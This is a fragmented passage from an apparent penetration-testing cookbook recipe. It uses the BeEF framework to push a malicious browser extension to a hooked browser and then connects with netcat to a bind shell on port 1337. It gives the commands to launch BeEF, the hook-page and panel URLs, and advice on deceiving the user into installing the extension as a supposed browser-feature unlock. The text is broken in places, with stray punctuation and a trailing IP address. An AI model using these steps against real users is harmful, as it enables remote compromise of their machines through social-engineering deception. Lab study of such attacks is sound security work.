In previous chapters, we saw what BeEF (the Browser Exploitation Framework) is capable of. In this recipe, we will use it to send a malicious browser extension, which when executed, will give us a remote bind shell to the system.
cd /usr/share/beef-xss/ ./beef
http://192.168.56.1:3000/demos/butcher/index.html
.http://127.0.0.1:3000/ui/panel
). We must see the new hooked browser there.As it is marked orange (the command module works against the target, but may be visible to the user), we may need to work on social engineering to make the user accept the extension.
The last two steps are highly reliant on social engineering and on convincing the user that the add-on is worth the effort of installing and authorizing it.
nc 192.168.56.102 1337
Now, we are connected to the client and have the ability to execute commands in it.
What BeEF does, once the client is hooked to it, is send the order (through the hook.js
) to the browser to download the extension. Once it is downloaded, it's up to the user to install it or not.
As said earlier, this attack depends on the user to do key tasks, it's up to us to convince the user via social engineering that she must install that extension. This could be achieved through the text in the page, saying that it is absolutely necessary to unlock some useful features in the browser.
After the user installs the extension, we just have to use Netcat to connect to port 1337 and begin issuing commands.
18.188.178.181